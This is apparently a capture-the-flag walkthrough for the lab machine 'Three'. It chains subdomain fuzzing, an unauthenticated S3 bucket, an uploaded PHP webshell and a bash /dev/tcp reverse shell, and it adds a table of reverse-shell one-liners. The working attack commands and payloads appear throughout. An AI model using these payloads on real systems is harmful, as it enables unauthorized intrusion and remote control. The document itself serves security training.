⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Three introduces cloud security fundamentals through an attack chain that combines subdomain enumeration, discovery of a misconfigured public AWS S3 bucket, uploading a PHP webshell, and catching a reverse shell. This machine is particularly relevant to modern security — cloud storage misconfigurations are among the most prevalent real-world findings, and the ability to weaponise a writable S3 bucket for code execution is a critical skill.

Tools: nmap · awscli · gobuster · netcat  ·  Difficulty: Easy  ·  OS: Linux
01 — What You Will Learn
SkillWhy it matters
Subdomain enumerationSubdomains often expose dev/staging environments with weaker security
S3 bucket enumeration via awscliPublic S3 buckets are a top cloud misconfiguration — writable ones enable file upload
PHP webshell uploadUploading executable code to a web-accessible location is the classic web shell path
Reverse shell with netcatTurning command execution into an interactive shell is a core post-exploitation skill
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 80/tcp open http Apache httpd 2.4.29

Port 80 runs a website. Inspect the page source for any hints about the domain or subdomains — you'll find a contact email that reveals the domain: thetoppers.htb.

Add to /etc/hosts
sudo echo "10.129.x.x thetoppers.htb" >> /etc/hosts
03 — Subdomain Enumeration
Fuzz for virtual hosts / subdomains
gobuster vhost \ -u http://thetoppers.htb \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ --append-domain
Output
Found: s3.thetoppers.htb (Status: 404)

What you're seeing: an S3-style subdomain — s3.thetoppers.htb. This is a LocalStack or self-hosted S3-compatible endpoint. Add it to /etc/hosts and interact with it using the AWS CLI.

Add subdomain to /etc/hosts
sudo echo "10.129.x.x s3.thetoppers.htb" >> /etc/hosts
04 — Enumerating the S3 Bucket
List buckets (no real credentials needed for open buckets)
aws --endpoint-url http://s3.thetoppers.htb s3 ls \ --no-sign-request
Output
2022-04-13 19:23:29 thetoppers.htb
List the bucket contents
aws --endpoint-url http://s3.thetoppers.htb s3 ls s3://thetoppers.htb \ --no-sign-request
Output
PRE images/ 2022-04-13 19:23:29 0 .htaccess 2022-04-13 19:23:29 9053 index.php

What you're seeing: the S3 bucket contains the web application files — including index.php. The website is being served directly from this S3 bucket. If you can upload a PHP file, it will be executable via the web server.

05 — Uploading a Webshell
Create a minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Upload to the bucket
aws --endpoint-url http://s3.thetoppers.htb s3 cp shell.php \ s3://thetoppers.htb/shell.php --no-sign-request
Test command execution
curl http://thetoppers.htb/shell.php?cmd=id # uid=33(www-data) gid=33(www-data) groups=33(www-data)
✓ Remote code execution confirmed as www-data.
06 — Getting a Reverse Shell
Start a netcat listener on your machine
nc -lvnp 4444
Trigger the reverse shell via the webshell (URL-encode the payload)
curl "http://thetoppers.htb/shell.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/YOUR_IP/4444+0>%261'"
Find the flag
find / -name flag.txt 2>/dev/null cat /var/www/flag.txt
✓ Submit the flag string to complete the machine.
07 — Reverse Shell One-liners Reference
PayloadNotes
bash -i >& /dev/tcp/IP/PORT 0>&1Most reliable on Linux — requires bash
python3 -c 'import socket,subprocess...'Works when bash is restricted, Python available
php -r '$sock=fsockopen("IP",PORT);...'PHP one-liner — useful in webshell context
nc -e /bin/sh IP PORTNetcat with -e flag (not available on all versions)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT>/tmp/fFIFO-based — works on netcat without -e
08 — Key Takeaways
S3 buckets hosting web application files are a critical misconfiguration. If the bucket is writable, the website is fully compromised — any uploaded PHP file becomes executable code running on the server.
ConceptReal-world relevance
S3 public write accessOne of the most impactful cloud misconfigs — check bucket ACLs and block public access settings
Subdomain enumerationDev/staging subdomains regularly expose admin panels, internal APIs, and cloud storage endpoints
Webshell → reverse shellA webshell gives command execution, but a reverse shell gives an interactive session — always upgrade
awscli with --no-sign-requestPublic S3 resources don't require AWS credentials — the --no-sign-request flag bypasses auth entirely